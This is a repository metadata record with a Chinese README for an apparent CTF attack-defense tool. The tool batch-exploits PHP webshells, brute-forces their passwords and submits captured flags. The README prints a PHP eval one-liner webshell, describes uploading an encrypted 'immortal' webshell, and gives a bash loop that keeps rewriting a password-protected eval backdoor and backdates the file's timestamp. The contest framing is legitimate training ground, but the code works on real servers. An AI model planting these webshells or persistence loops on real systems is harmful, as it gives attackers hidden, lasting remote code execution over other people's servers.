{"id":13777419,"url":"https://github.com/ares-x/awd-predator-framework","last_synced_at":"2025-05-11T11:33:35.124Z","repository":{"id":44895098,"uuid":"105864104","full_name":"Ares-X/AWD-Predator-Framework","owner":"Ares-X","description":"AWD攻防赛webshell批量利用框架","archived":false,"fork":false,"pushed_at":"2019-06-19T13:29:34.000Z","size":92,"stargazers_count":380,"open_issues_count":3,"forks_count":88,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-08-03T18:11:32.577Z","etag":null,"topics":["awd","ctf","ctf-framework","ctf-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ares-X.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-10-05T08:04:00.000Z","updated_at":"2024-08-02T07:21:38.000Z","dependencies_parsed_at":"2022-08-17T21:41:01.251Z","dependency_job_id":null,"html_url":"https://github.com/Ares-X/AWD-Predator-Framework","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ares-X%2FAWD-Predator-Framework","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ares-X%2FAWD-Predator-Framework/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ares-X%2FAWD-Predator-Framework/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ares-X%2FAWD-Predator-Framework/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ares-X","download_url":"https://codeload.github.com/Ares-X/AWD-Predator-Framework/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225043125,"owners_count":17411931,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["awd","ctf","ctf-framework","ctf-tools"],"created_at":"2024-08-03T18:00:43.101Z","updated_at":"2024-11-17T13:30:43.097Z","avatar_url":"https://github.com/Ares-X.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"faa91844951d2c29b7b571c6e8a3eb54\"\u003e\u003c/a\u003e新添加"],"sub_categories":[],"readme":"    AWD Predator Framework v2.0                   \n\n              --code by AresX       \n\t\t\t  \n\n* 在AWD攻防赛中通过给定的webshell批量获取提交flag\n\n* 为不会现场挖洞写脚本的菜鸡准备\n\n* 用py去实现菜刀是一件代码量很大的事情，懒得做也不会做(以后可能会做)，所以需要手动设置一句话的功能函数和方法\n\n* 针对简单的单参数传递的一句话和特定的加密一句话\n\n# 启动\n\n    python console.py\n\n\n# webshell\n\n**添加已知的webshell,仅支持php，GET和POST方法使用eval和exec函数的一句话木马**\n\n### 添加webshell\n\n命令`add`\n\n使用方法: `add [shell path] [pwd] [type(eval/exec)] [method(get/post)]`\n\n如一句话为`\u003c?php @eval($_POST[‘cmd’]);?\u003e` 路径为`x.x.x.x:8001://index/cmd.php`\n\n一句话密码为`cmd` 功能函数为`eval` 方法为`POST`\n\n\nexample:`add :8001/index/cmd.php cmd eval post`\n\n注意这里添加一句话路径不加ip地址,ip地址要使用命令`ip`生成\n\n命令执行后webshell的路径和密码会以字典的形式储存\n\n**处理了使用md5加密的eval函数一句话,**\n\nget方法在添加时,可添加带md5加密的密码的路径\n\n如:`add :8003/x.php?pass=fuckyou x eval get` \n\npost方法请在`flag.py`中修改`for j in POST_eval_shells_path_pwd:`循环中的`eval_POST_data['pass']`为自己的密码，密码将被自动传递\n\npost添加方法同`add :8001/index/cmd.php cmd eval post`\n\n### 显示添加的webshell\n\n命令`show`\n\n将显示所有添加的webshell路径和密码\n\n### 保存,读取,清空webshell\n*保存已经添加的webshell路径和密码，方便临场修改代码*\n\n保存:`save`\n读取:`load`\n清空:`clear` //清空不会清空已经储存的webshell,除非在清空后执行保存命令\n\n### Webshell爆破\n\n*采用一种提速千倍的爆破方法*\n\n命令: `crack http://xxx.php`\n\n字典储存在`auxi/pwd.txt`中，可自行完善字典\n\n\n# iplist\n\n**根据输入生成指定段的ip列表**\n\n### 生成列表\n\n命令: `ip x.x.a-b.x`\n\n可设定acb任意段的ip列表,使用'-'连接左右区间\n\n### 添加指定ip\n\n命令: `ip x.x.x.x`\n\n执行命令后,`x.x.x.x`将被添加到ip列表中,会自动去除重复项和进行排序\n\n### 查看已经生成的列表\n\n命令: `showip`\n\n显示生成的ip列表\n\n### 清空ip列表\n\n命令: `clearip`\n\n### 去掉指定ip\n\n命令: `removeip x.x.x.x`\n\n# flag\n\n**通过iplist和webshell获取flag，将获取到的flag提交到指定服务器**\n\n### 获取flag\n*遍历iplist中所有的地址尝试通过所有已经添加的webshell获取flag,在执行此命令前需设定iplist，否则报错*\n\n命令:`getflag [command]`\n\nexample:`getflag curl www.baidu.com/flag.txt`\n\n获取命令如果不需要修改只需完整输入一次，之后可直接执行`getflag`\n\n### 查看flag\n\n命令: `showflag`\n\n\n\n### 提交flag\n\n**攻防赛环境中获取到的flag通常不是标准格式,`flag.py`中的`submit_flag`函数中已经使用了`re.compile(r'flag{\\w+?}')`尝试匹配标准flag格式**\n**如果出现问题,请自行在`flag.py`文件的`submit_flag`函数中使用正则匹配获得标准flag进行提交**\n\n*提交flag 需设定提交flag的链接，以及cookie和data,使用\"?\"替换flag在data中所在的参数*\n\n命令: `submit [url] [cookie] [data](use '?' replace the flag )`\n\nexample: `submit http:xxx.xxx.xx/xx/ JSESSIONID=A6F8;route=6cf03 pid=-1\u0026pidName=\u0026flag=?`\n**去掉cookie中的空格,data中flag所在位置需用?代替！**\n\n提交命令如果不需要修改只需完整输入一次，之后可直接执行`submit`\n\nsubmit完成之后会有清空flag的选项(y/n)\n\n### 清空flag\n\n命令: `clearflag`\n\n# 上传\n\n## 文件木马上传\n\n命令: `upload \u003cfile\u003e(default='auxi/shell.php')`\n\n默认上传文件为`auxi/shell.php` 如需使用修改默认文件,默认文件为加密不死马\n\n如需上传其他文件,将文件储存在`auxi/`目录下\n\n执行`upload xxx`即可\n\n如上传默认文件,直接执行`upload`\n\n如果文件上传成功，会自动访问一次上传的文件，激活不死马\n\n## 命令木马上传\n\n命令: `cupload`\n\n连接一句话执行bash命令生成不死马`.index1.php`\n\nbash命令为:`system('while true;do echo \\'\u003c?php if(md5($_POST[\"pass\"])==\"3a50065e1709acc47ba0c9238294364f\"){@eval($_POST[a]);} ?\u003e\\' \u003efuck.php;touch -m -d \"2017-11-12 10:10:10\" .index1.php;sleep 1;done;');`\n\n如果要修改请修改`command.py`中的`data[z0]`\n\n---\n\n\n### 目录结构\n```\n###########\n├── Readme.md               //帮助文档 \n├── console.py              //启动\n├── core                    // 核心模块\n│   ├── shells.py           //写入，读取，保存webshell\n│   ├── flag.py             // 获取，提交flag\n│   ├── iplist.py           // 生成ip列表   \n│—— auxi                    //辅助模块\n|   |—— upload.py           //webshell上传功能\n|   |—— shell.php           //默认上传文件\n|   |—— webshell.txt        //一句话储存路径  \n|   |—— command.py          //上传bash不死马\n|—— data                    //webshell数据储存\n\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fares-x%2Fawd-predator-framework","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fares-x%2Fawd-predator-framework","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fares-x%2Fawd-predator-framework/lists"}